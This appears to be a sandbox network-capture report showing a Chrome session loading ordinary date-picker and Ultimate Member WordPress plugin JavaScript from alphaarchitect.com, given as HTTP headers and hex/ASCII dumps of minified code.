                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC1369INData Raw: 3b 29 61 3d 73 2e 63 72 65 61 74 65 28 5b 61 2e 79 65 61 72 2c 61 2e 6d 6f 6e 74 68 2c 61 2e 64 61 74 65 2b 63 5d 29 3b 72 65 74 75 72 6e 20 61 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 64 69 73 61 62 6c 65 64 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 61 3d 74 68 69 73 2c 65 3d 28 65 3d 61 2e 69 74 65 6d 2e 64 69 73 61 62 6c 65 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 79 2e 69 73 49 6e 74 65 67 65 72 28 65 29 3f 74 2e 64 61 79 3d 3d 3d 28 61 2e 73 65 74 74 69 6e 67 73 2e 66 69 72 73 74 44 61 79 3f 65 3a 65 2d 31 29 25 37 3a 70 2e 69 73 41 72 72 61 79 28 65 29 7c 7c 79 2e 69 73 44 61 74 65 28 65 29 3f 74 2e 70 69 63 6b 3d 3d 3d 61 2e 63 72 65 61 74 65 28 65 29 2e 70 69 63 6b 3a 70 2e 69 73 50 6c 61 69 6e 4f
                                                                                                                                                                                                                                                                        Data Ascii: ;)a=s.create([a.year,a.month,a.date+c]);return a},a.prototype.disabled=function(t){var a=this,e=(e=a.item.disable.filter(function(e){return y.isInteger(e)?t.day===(a.settings.firstDay?e:e-1)%7:p.isArray(e)||y.isDate(e)?t.pick===a.create(e).pick:p.isPlainO
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC1369INData Raw: 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 3f 34 3a 74 2e 79 65 61 72 7d 2c 74 6f 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 70 6c 69 74 28 2f 28 64 7b 31 2c 34 7d 7c 6d 7b 31 2c 34 7d 7c 79 7b 34 7d 7c 79 79 7c 21 2e 29 2f 67 29 7d 2c 74 6f 53 74 72 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 61 3d 74 68 69 73 3b 72 65 74 75 72 6e 20 61 2e 66 6f 72 6d 61 74 73 2e 74 6f 41 72 72 61 79 28 65 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 79 2e 74 72 69 67 67 65 72 28 61 2e 66 6f 72 6d 61 74 73 5b 65 5d 2c 61 2c 5b 30 2c 74 5d 29 7c 7c 65 2e 72 65 70 6c 61 63 65 28 2f 5e 21 2f 2c 22 22 29 7d 29 2e 6a 6f 69 6e 28 22 22 29 7d 7d 2c 61 2e 70 72 6f 74 6f 74 79
                                                                                                                                                                                                                                                                        Data Ascii: tion(e,t){return e?4:t.year},toArray:function(e){return e.split(/(d{1,4}|m{1,4}|y{4}|yy|!.)/g)},toString:function(e,t){var a=this;return a.formats.toArray(e).map(function(e){return y.trigger(a.formats[e],a,[0,t])||e.replace(/^!/,"")}).join("")}},a.prototy
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC1369INData Raw: 73 61 62 6c 65 2c 73 3d 6f 2e 6c 65 6e 67 74 68 3b 72 65 74 75 72 6e 22 66 6c 69 70 22 3d 3d 74 3f 72 2e 66 6c 69 70 45 6e 61 62 6c 65 28 29 3a 21 30 3d 3d 3d 74 3f 28 72 2e 66 6c 69 70 45 6e 61 62 6c 65 28 31 29 2c 6f 3d 5b 5d 29 3a 21 31 3d 3d 3d 74 3f 28 72 2e 66 6c 69 70 45 6e 61 62 6c 65 28 2d 31 29 2c 6f 3d 5b 5d 29 3a 74 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 61 2c 6e 2c 69 3d 30 3b 69 3c 73 3b 69 2b 3d 31 29 7b 69 66 28 61 3d 6f 5b 69 5d 2c 72 2e 69 73 44 61 74 65 45 78 61 63 74 28 61 2c 65 29 29 7b 6e 3d 21 28 74 3d 6f 5b 69 5d 3d 6e 75 6c 6c 29 3b 62 72 65 61 6b 7d 69 66 28 72 2e 69 73 44 61 74 65 4f 76 65 72 6c 61 70 28 61 2c 65 29 29 7b 70 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 65 29 3f 28 65 2e
                                                                                                                                                                                                                                                                        Data Ascii: sable,s=o.length;return"flip"==t?r.flipEnable():!0===t?(r.flipEnable(1),o=[]):!1===t?(r.flipEnable(-1),o=[]):t.map(function(e){for(var t,a,n,i=0;i<s;i+=1){if(a=o[i],r.isDateExact(a,e)){n=!(t=o[i]=null);break}if(r.isDateOverlap(a,e)){p.isPlainObject(e)?(e.
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC1369INData Raw: 63 74 69 6f 6e 20 61 28 29 7b 76 61 72 20 65 2c 74 2c 61 2c 6e 2c 69 3d 68 2e 79 65 61 72 2c 72 3d 21 30 3d 3d 3d 6c 2e 73 65 6c 65 63 74 59 65 61 72 73 3f 35 3a 7e 7e 28 6c 2e 73 65 6c 65 63 74 59 65 61 72 73 2f 32 29 3b 72 65 74 75 72 6e 20 72 3f 28 61 3d 70 2e 79 65 61 72 2c 65 3d 66 2e 79 65 61 72 2c 74 3d 69 2b 72 2c 28 72 3d 69 2d 72 29 3c 61 26 26 28 74 2b 3d 61 2d 72 2c 72 3d 61 29 2c 65 3c 74 26 26 28 72 2d 3d 28 6e 3d 74 2d 65 29 3c 28 61 3d 72 2d 61 29 3f 6e 3a 61 2c 74 3d 65 29 2c 79 2e 6e 6f 64 65 28 22 73 65 6c 65 63 74 22 2c 79 2e 67 72 6f 75 70 28 7b 6d 69 6e 3a 72 2c 6d 61 78 3a 74 2c 69 3a 31 2c 6e 6f 64 65 3a 22 6f 70 74 69 6f 6e 22 2c 69 74 65 6d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 5b 65 2c 30 2c 22 76 61 6c 75 65
                                                                                                                                                                                                                                                                        Data Ascii: ction a(){var e,t,a,n,i=h.year,r=!0===l.selectYears?5:~~(l.selectYears/2);return r?(a=p.year,e=f.year,t=i+r,(r=i-r)<a&&(t+=a-r,r=a),e<t&&(r-=(n=t-e)<(a=r-a)?n:a,t=e),y.node("select",y.group({min:r,max:t,i:1,node:"option",item:function(e){return[e,0,"value
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC1369INData Raw: 28 28 74 3d 5b 6c 2e 6b 6c 61 73 73 2e 64 61 79 5d 29 2e 70 75 73 68 28 68 2e 6d 6f 6e 74 68 3d 3d 65 2e 6d 6f 6e 74 68 3f 6c 2e 6b 6c 61 73 73 2e 69 6e 66 6f 63 75 73 3a 6c 2e 6b 6c 61 73 73 2e 6f 75 74 66 6f 63 75 73 29 2c 63 2e 70 69 63 6b 3d 3d 65 2e 70 69 63 6b 26 26 74 2e 70 75 73 68 28 6c 2e 6b 6c 61 73 73 2e 6e 6f 77 29 2c 61 26 26 74 2e 70 75 73 68 28 6c 2e 6b 6c 61 73 73 2e 73 65 6c 65 63 74 65 64 29 2c 6e 26 26 74 2e 70 75 73 68 28 6c 2e 6b 6c 61 73 73 2e 68 69 67 68 6c 69 67 68 74 65 64 29 2c 69 26 26 74 2e 70 75 73 68 28 6c 2e 6b 6c 61 73 73 2e 64 69 73 61 62 6c 65 64 29 2c 74 2e 6a 6f 69 6e 28 22 20 22 29 29 2c 22 64 61 74 61 2d 70 69 63 6b 3d 22 2b 65 2e 70 69 63 6b 2b 22 20 22 2b 79 2e 61 72 69 61 41 74 74 72 28 7b 72 6f 6c 65 3a 22 67 72
                                                                                                                                                                                                                                                                        Data Ascii: ((t=[l.klass.day]).push(h.month==e.month?l.klass.infocus:l.klass.outfocus),c.pick==e.pick&&t.push(l.klass.now),a&&t.push(l.klass.selected),n&&t.push(l.klass.highlighted),i&&t.push(l.klass.disabled),t.join(" ")),"data-pick="+e.pick+" "+y.ariaAttr({role:"gr
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC757INData Raw: 75 72 73 64 61 79 22 2c 22 46 72 69 64 61 79 22 2c 22 53 61 74 75 72 64 61 79 22 5d 2c 77 65 65 6b 64 61 79 73 53 68 6f 72 74 3a 5b 22 53 75 6e 22 2c 22 4d 6f 6e 22 2c 22 54 75 65 22 2c 22 57 65 64 22 2c 22 54 68 75 22 2c 22 46 72 69 22 2c 22 53 61 74 22 5d 2c 74 6f 64 61 79 3a 22 54 6f 64 61 79 22 2c 63 6c 65 61 72 3a 22 43 6c 65 61 72 22 2c 63 6c 6f 73 65 3a 22 43 6c 6f 73 65 22 2c 63 6c 6f 73 65 4f 6e 53 65 6c 65 63 74 3a 21 30 2c 63 6c 6f 73 65 4f 6e 43 6c 65 61 72 3a 21 30 2c 75 70 64 61 74 65 49 6e 70 75 74 3a 21 30 2c 66 6f 72 6d 61 74 3a 22 64 20 6d 6d 6d 6d 2c 20 79 79 79 79 22 2c 6b 6c 61 73 73 3a 7b 74 61 62 6c 65 3a 28 74 3d 65 2e 6b 6c 61 73 73 65 73 28 29 2e 70 69 63 6b 65 72 2b 22 5f 5f 22 29 2b 22 74 61 62 6c 65 22 2c 68 65 61 64 65 72 3a
                                                                                                                                                                                                                                                                        Data Ascii: ursday","Friday","Saturday"],weekdaysShort:["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],today:"Today",clear:"Clear",close:"Close",closeOnSelect:!0,closeOnClear:!0,updateInput:!0,format:"d mmmm, yyyy",klass:{table:(t=e.klasses().picker+"__")+"table",header:


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        67192.168.2.449825141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC797OUTGET /wp-content/plugins/ultimate-member/assets/js/um-functions.min.js?ver=2.9.1 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:53 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-2f8f"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 53987
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9f31b177283-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC878INData Raw: 32 66 38 66 0d 0a 66 75 6e 63 74 69 6f 6e 20 55 4d 5f 64 6f 6d 65 6e 75 73 28 29 7b 6a 51 75 65 72 79 28 22 2e 75 6d 2d 64 72 6f 70 64 6f 77 6e 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6f 29 7b 55 4d 2e 64 72 6f 70 64 6f 77 6e 2e 73 65 74 50 6f 73 69 74 69 6f 6e 28 6f 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 55 4d 5f 63 68 65 63 6b 5f 70 61 73 73 77 6f 72 64 5f 6d 61 74 63 68 65 64 28 29 7b 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 6b 65 79 75 70 22 2c 22 69 6e 70 75 74 5b 64 61 74 61 2d 6b 65 79 3d 75 73 65 72 5f 70 61 73 73 77 6f 72 64 5d 2c 69 6e 70 75 74 5b 64 61 74 61 2d 6b 65 79 3d 63 6f 6e 66 69 72 6d 5f 75 73 65 72 5f 70 61 73 73 77 6f 72 64 5d 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6f 3d 6a 51 75
                                                                                                                                                                                                                                                                        Data Ascii: 2f8ffunction UM_domenus(){jQuery(".um-dropdown").each(function(e,o){UM.dropdown.setPosition(o)})}function UM_check_password_matched(){jQuery(document).on("keyup","input[data-key=user_password],input[data-key=confirm_user_password]",function(e){var o=jQu
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC1369INData Raw: 6a 51 75 65 72 79 28 74 68 69 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 75 69 6d 6f 62 39 36 30 22 29 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 61 64 64 43 6c 61 73 73 28 22 75 69 6d 6f 62 33 34 30 22 29 29 3a 65 6c 65 6d 65 6e 74 5f 77 69 64 74 68 3c 3d 35 30 30 3f 28 6a 51 75 65 72 79 28 74 68 69 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 75 69 6d 6f 62 33 34 30 22 29 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 75 69 6d 6f 62 35 30 30 22 29 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 75 69 6d 6f 62 38 30 30 22 29 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 75 69 6d 6f 62 39 36 30 22 29 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 61 64
                                                                                                                                                                                                                                                                        Data Ascii: jQuery(this).removeClass("uimob960"),jQuery(this).addClass("uimob340")):element_width<=500?(jQuery(this).removeClass("uimob340"),jQuery(this).removeClass("uimob500"),jQuery(this).removeClass("uimob800"),jQuery(this).removeClass("uimob960"),jQuery(this).ad
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC1369INData Raw: 64 5f 68 65 6c 70 5f 74 65 78 74 22 29 3f 27 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 65 6c 70 22 3e 27 2b 64 2e 64 61 74 61 28 22 75 70 6c 6f 61 64 5f 68 65 6c 70 5f 74 65 78 74 22 29 2b 22 3c 2f 73 70 61 6e 3e 22 3a 22 22 2c 69 63 6f 6e 3d 64 2e 64 61 74 61 28 22 69 63 6f 6e 22 29 3f 27 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 22 3e 3c 69 20 63 6c 61 73 73 3d 22 27 2b 64 2e 64 61 74 61 28 22 69 63 6f 6e 22 29 2b 27 22 3e 3c 2f 69 3e 3c 2f 73 70 61 6e 3e 27 3a 22 22 2c 75 70 6c 6f 61 64 5f 74 65 78 74 3d 64 2e 64 61 74 61 28 22 75 70 6c 6f 61 64 5f 74 65 78 74 22 29 3f 27 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 72 22 3e 27 2b 64 2e 64 61 74 61 28 22 75 70 6c 6f 61 64 5f 74 65 78 74 22 29 2b 22 3c 2f 73 70 61 6e 3e 22 3a 22 22 3b 76 61 72
                                                                                                                                                                                                                                                                        Data Ascii: d_help_text")?'<span class="help">'+d.data("upload_help_text")+"</span>":"",icon=d.data("icon")?'<span class="icon"><i class="'+d.data("icon")+'"></i></span>':"",upload_text=d.data("upload_text")?'<span class="str">'+d.data("upload_text")+"</span>":"";var
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC1369INData Raw: 64 2e 70 61 72 65 6e 74 73 28 22 2e 75 6d 2d 6d 6f 64 61 6c 2d 62 6f 64 79 22 29 2e 66 69 6e 64 28 22 2e 75 6d 2d 73 69 6e 67 6c 65 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 20 69 6d 67 22 29 2c 74 3d 64 2e 70 61 72 65 6e 74 73 28 22 2e 75 6d 2d 6d 6f 64 61 6c 2d 62 6f 64 79 22 29 2e 66 69 6e 64 28 22 2e 75 6d 2d 73 69 6e 67 6c 65 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 22 29 2c 69 3d 6e 65 77 20 44 61 74 65 3b 61 2e 61 74 74 72 28 22 73 72 63 22 2c 6f 2e 75 72 6c 2b 22 3f 22 2b 69 2e 67 65 74 54 69 6d 65 28 29 29 2c 61 2e 64 61 74 61 28 22 66 69 6c 65 22 2c 6f 2e 66 69 6c 65 29 2c 61 2e 6f 6e 28 22 6c 6f 61 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 64 2e 70 61 72 65 6e 74 73 28 22 2e 75 6d 2d 6d 6f 64 61 6c 2d 62 6f 64 79 22 29 2e 66 69 6e 64 28 22 2e
                                                                                                                                                                                                                                                                        Data Ascii: d.parents(".um-modal-body").find(".um-single-image-preview img"),t=d.parents(".um-modal-body").find(".um-single-image-preview"),i=new Date;a.attr("src",o.url+"?"+i.getTime()),a.data("file",o.file),a.on("load",function(){d.parents(".um-modal-body").find(".
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC1369INData Raw: 6d 61 78 46 69 6c 65 43 6f 75 6e 74 45 72 72 6f 72 53 74 72 3a 74 2e 64 61 74 61 28 22 6d 61 78 5f 66 69 6c 65 73 5f 65 72 72 6f 72 22 29 2c 6d 61 78 46 69 6c 65 43 6f 75 6e 74 3a 31 2c 73 68 6f 77 44 65 6c 65 74 65 3a 21 31 2c 73 68 6f 77 41 62 6f 72 74 3a 21 31 2c 73 68 6f 77 44 6f 6e 65 3a 21 31 2c 73 68 6f 77 46 69 6c 65 43 6f 75 6e 74 65 72 3a 21 31 2c 73 68 6f 77 53 74 61 74 75 73 41 66 74 65 72 53 75 63 63 65 73 73 3a 21 30 2c 6f 6e 53 75 62 6d 69 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 2e 70 61 72 65 6e 74 73 28 22 2e 75 6d 2d 6d 6f 64 61 6c 2d 62 6f 64 79 22 29 2e 66 69 6e 64 28 22 2e 75 6d 2d 65 72 72 6f 72 2d 62 6c 6f 63 6b 22 29 2e 72 65 6d 6f 76 65 28 29 7d 2c 6f 6e 53 75 63 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6f 2c 61 29 7b
                                                                                                                                                                                                                                                                        Data Ascii: maxFileCountErrorStr:t.data("max_files_error"),maxFileCount:1,showDelete:!1,showAbort:!1,showDone:!1,showFileCounter:!1,showStatusAfterSuccess:!0,onSubmit:function(e){t.parents(".um-modal-body").find(".um-error-block").remove()},onSuccess:function(e,o,a){
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC1369INData Raw: 29 7d 2c 6f 6e 45 72 72 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 65 29 7d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 75 6d 5f 6e 65 77 5f 6d 6f 64 61 6c 28 65 2c 6f 2c 61 2c 74 29 7b 76 61 72 20 69 2c 64 2c 73 2c 72 3d 6a 51 75 65 72 79 28 22 2e 75 6d 2d 6d 6f 64 61 6c 2d 6f 76 65 72 6c 61 79 22 29 2c 72 3d 28 30 21 3d 3d 72 2e 6c 65 6e 67 74 68 26 26 28 72 2e 68 69 64 65 28 29 2c 72 2e 6e 65 78 74 28 22 2e 75 6d 2d 6d 6f 64 61 6c 22 29 2e 68 69 64 65 28 29 29 2c 55 4d 2e 63 6f 6d 6d 6f 6e 2e 74 69 70 73 79 2e 68 69 64 65 28 29 2c 55 4d 2e 64 72 6f 70 64 6f 77 6e 2e 68 69 64 65 41 6c 6c 28 29 2c 6a 51 75 65 72 79 28 22 62 6f 64 79 2c 68 74 6d 6c 2c 74 65 78 74 61 72 65 61 22 29 2e 63 73 73 28 22 6f 76 65 72 66 6c 6f 77 22
                                                                                                                                                                                                                                                                        Data Ascii: )},onError:function(e){console.log(e)}})}function um_new_modal(e,o,a,t){var i,d,s,r=jQuery(".um-modal-overlay"),r=(0!==r.length&&(r.hide(),r.next(".um-modal").hide()),UM.common.tipsy.hide(),UM.dropdown.hideAll(),jQuery("body,html,textarea").css("overflow"
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC1369INData Raw: 69 67 68 74 2c 64 3d 6a 51 75 65 72 79 28 22 2e 75 6d 2d 6d 6f 64 61 6c 3a 76 69 73 69 62 6c 65 22 29 2e 6e 6f 74 28 22 2e 75 6d 2d 6d 6f 64 61 6c 2d 68 69 64 64 65 6e 22 29 2c 73 3d 64 2e 66 69 6e 64 28 22 2e 75 6d 2d 6d 6f 64 61 6c 2d 62 6f 64 79 2e 70 68 6f 74 6f 3a 76 69 73 69 62 6c 65 22 29 3b 28 73 2e 6c 65 6e 67 74 68 7c 7c 64 2e 6c 65 6e 67 74 68 29 26 26 28 65 3d 28 69 2d 64 2e 69 6e 6e 65 72 48 65 69 67 68 74 28 29 29 2f 32 2b 22 70 78 22 2c 64 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 75 69 6d 6f 62 33 34 30 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 75 69 6d 6f 62 35 30 30 22 29 2c 73 2e 6c 65 6e 67 74 68 3f 28 73 3d 74 2d 36 30 2c 61 3d 69 2d 2e 32 35 2a 69 2c 28 6f 3d 6a 51 75 65 72 79 28 22 2e 75 6d 2d 6d 6f 64 61 6c 2d 70 68 6f 74 6f
                                                                                                                                                                                                                                                                        Data Ascii: ight,d=jQuery(".um-modal:visible").not(".um-modal-hidden"),s=d.find(".um-modal-body.photo:visible");(s.length||d.length)&&(e=(i-d.innerHeight())/2+"px",d.removeClass("uimob340").removeClass("uimob500"),s.length?(s=t-60,a=i-.25*i,(o=jQuery(".um-modal-photo
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC1369INData Raw: 2e 75 6d 2d 70 6f 70 75 70 22 29 29 2c 55 4d 2e 63 6f 6d 6d 6f 6e 2e 74 69 70 73 79 2e 68 69 64 65 28 29 2c 6a 51 75 65 72 79 28 22 2e 75 6d 2d 70 6f 70 75 70 22 29 2e 65 6d 70 74 79 28 29 2e 72 65 6d 6f 76 65 28 29 2c 6a 51 75 65 72 79 28 22 2e 75 6d 2d 70 6f 70 75 70 2d 6f 76 65 72 6c 61 79 22 29 2e 65 6d 70 74 79 28 29 2e 72 65 6d 6f 76 65 28 29 2c 6a 51 75 65 72 79 28 22 62 6f 64 79 2c 68 74 6d 6c 22 29 2e 63 73 73 28 7b 6f 76 65 72 66 6c 6f 77 3a 22 61 75 74 6f 22 7d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 73 68 6f 77 5f 4d 6f 64 61 6c 28 65 29 7b 6a 51 75 65 72 79 28 22 2e 75 6d 2d 70 6f 70 75 70 2d 6f 76 65 72 6c 61 79 22 29 2e 6c 65 6e 67 74 68 26 26 28 6a 51 75 65 72 79 28 22 2e 75 6d 2d 70 6f 70 75 70 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22
                                                                                                                                                                                                                                                                        Data Ascii: .um-popup")),UM.common.tipsy.hide(),jQuery(".um-popup").empty().remove(),jQuery(".um-popup-overlay").empty().remove(),jQuery("body,html").css({overflow:"auto"}))}function show_Modal(e){jQuery(".um-popup-overlay").length&&(jQuery(".um-popup").removeClass("
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC1369INData Raw: 29 3a 61 2e 73 69 62 6c 69 6e 67 73 28 22 61 22 29 2e 6c 65 6e 67 74 68 3f 61 2e 73 69 62 6c 69 6e 67 73 28 22 61 22 29 2e 66 69 72 73 74 28 29 3a 61 2e 70 61 72 65 6e 74 28 29 2c 75 3d 28 72 2e 61 64 64 43 6c 61 73 73 28 22 75 6d 2d 74 72 69 67 67 65 72 2d 6d 65 6e 75 2d 6f 6e 2d 22 2b 73 29 2c 30 29 2c 6e 3d 28 72 2e 6f 75 74 65 72 57 69 64 74 68 28 29 2d 74 29 2f 32 2c 6c 3d 72 2e 6f 75 74 65 72 48 65 69 67 68 74 28 29 2c 69 3d 72 2e 6f 66 66 73 65 74 28 29 3b 73 77 69 74 63 68 28 72 2e 69 73 28 22 2e 75 6d 2d 70 72 6f 66 69 6c 65 2d 70 68 6f 74 6f 22 29 26 26 28 6f 3d 72 2e 66 69 6e 64 28 22 2e 75 6d 2d 70 72 6f 66 69 6c 65 2d 70 68 6f 74 6f 2d 69 6d 67 22 29 2c 6c 3d 72 2e 63 6c 6f 73 65 73 74 28 22 64 69 76 2e 75 69 6d 6f 62 35 30 30 22 29 2e 6c 65
                                                                                                                                                                                                                                                                        Data Ascii: ):a.siblings("a").length?a.siblings("a").first():a.parent(),u=(r.addClass("um-trigger-menu-on-"+s),0),n=(r.outerWidth()-t)/2,l=r.outerHeight(),i=r.offset();switch(r.is(".um-profile-photo")&&(o=r.find(".um-profile-photo-img"),l=r.closest("div.uimob500").le
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC353INData Raw: 73 68 6f 77 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 3d 6a 51 75 65 72 79 28 65 29 3b 55 4d 2e 64 72 6f 70 64 6f 77 6e 2e 68 69 64 65 41 6c 6c 28 29 2c 55 4d 2e 64 72 6f 70 64 6f 77 6e 2e 73 65 74 50 6f 73 69 74 69 6f 6e 28 65 29 2c 65 2e 73 68 6f 77 28 29 7d 7d 2c 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6a 51 75 65 72 79 28 22 2e 75 6d 2d 73 65 61 72 63 68 20 66 6f 72 6d 20 2a 22 29 2e 6f 6e 28 22 6b 65 79 70 72 65 73 73 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 31 33 3d 3d 65 2e 77 68 69 63 68 29 72 65 74 75 72 6e 20 6a 51 75 65 72 79 28 22 2e 75 6d 2d 73 65 61 72 63 68 20 66 6f 72 6d 22 29 2e 74 72 69 67 67 65 72 28 22 73 75 62 6d 69 74 22 29 2c 21 31 7d 29 2c 32 3d 3d 6a 51 75 65 72 79 28 22 69 6e 70 75 74 5b 64 61 74 61 2d 6b
                                                                                                                                                                                                                                                                        Data Ascii: show:function(e){e=jQuery(e);UM.dropdown.hideAll(),UM.dropdown.setPosition(e),e.show()}},jQuery(function(){jQuery(".um-search form *").on("keypress",function(e){if(13==e.which)return jQuery(".um-search form").trigger("submit"),!1}),2==jQuery("input[data-k


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        68192.168.2.449826141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC798OUTGET /wp-content/plugins/ultimate-member/assets/js/um-responsive.min.js?ver=2.9.1 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
